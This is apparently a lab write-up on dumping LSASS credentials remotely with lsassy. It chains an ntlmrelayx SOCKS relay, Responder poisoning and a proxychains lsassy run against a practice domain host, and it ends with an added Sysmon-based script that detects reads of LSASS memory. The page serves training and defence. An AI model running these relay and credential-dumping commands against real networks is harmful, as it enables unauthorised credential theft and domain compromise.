# Lsassy

* Use lsassy to retrieve the credentials stored in the LSASS process.
* Domain account information is stored in the LSASS process, so dumping this process can give you more domain accounts and privileges.
* [Lsassy](https://github.com/Hackndo/lsassy) lets you dump LSASS remotely, which is much more convenient than running procdump, downloading the LSASS dump file, and running pypykatz or mimikatz locally. It handles the painful steps for you, such as dumping and reading the LSASS content, and it dumps only the useful part of the LSASS dump, which reduces transfer time. Lsassy also exists as a CME module.

Install LSASSY

```
python3 -m pip install lsassy
```

Run ntlmrelayx.py and wait for a connection from fernando.alonzo

```
sudo ntlmrelayx.py -socks -smb2support -tf unsigned_smb.txt
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2Fnhw6FVKwGNsOZjy4VPgJ%2Fimage.png?alt=media&#x26;token=f4bbb649-4ac8-4b37-b868-b99443086f6d" alt=""><figcaption></figcaption></figure>

Run Responder

```
sudo responder -I enp0s3
```

Run LSASSY

```
proxychains lsassy --no-pass -d NORTH -u fernando.alonzo 192.168.56.22
```

![](https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2Fqn6KMQdBKcHKW5LB7N9Y%2Fimage.png?alt=media\&token=5e8b2b7b-b97a-4f25-bbcf-9bee8eafc53a)
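How the last step looks from the target host's telemetry, as an added example that is not part of the original page or of lsassy: reading LSASS memory needs a handle with `PROCESS_VM_READ`, which Sysmon records as Event ID 10 (ProcessAccess) when that logging is configured. The sample events, the host name `HOST-A` and the allowlist are constructed assumptions.

```python
import json

PROCESS_VM_READ = 0x0010  # access right required to read another process's memory

# Assumed allowlist (lowercase paths); build the real one from your own baseline.
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe"}

# Constructed sample events, one JSON object per line, using Sysmon field names.
SAMPLE_EVENTS = r"""
{"EventID": 10, "Computer": "HOST-A", "SourceImage": "C:\\Windows\\System32\\rundll32.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1fffff"}
{"EventID": 10, "Computer": "HOST-A", "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1fffff"}
{"EventID": 10, "Computer": "HOST-A", "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"}
{"EventID": 10, "Computer": "HOST-A", "SourceImage": "C:\\Windows\\System32\\rundll32.exe", "TargetImage": "C:\\Windows\\System32\\notepad.exe", "GrantedAccess": "0x1010"}
{"EventID": 1, "Computer": "HOST-A", "Image": "C:\\Windows\\System32\\cmd.exe"}
"""


def lsass_memory_reads(lines, allowed=ALLOWED_SOURCES):
    """Return ProcessAccess events where a non-allowlisted process got read access to lsass.exe."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if event.get("EventID") != 10:          # only ProcessAccess events
            continue
        if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            continue
        access = int(event.get("GrantedAccess", "0x0"), 16)
        if not access & PROCESS_VM_READ:        # handle cannot read memory
            continue
        source = event.get("SourceImage", "").lower()
        if source in allowed:                   # expected system process
            continue
        hits.append({"host": event.get("Computer"), "source": source, "access": access})
    return hits


if __name__ == "__main__":
    for hit in lsass_memory_reads(SAMPLE_EVENTS.splitlines()):
        print(f"{hit['host']}: {hit['source']} opened lsass.exe with {hit['access']:#x}")
```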
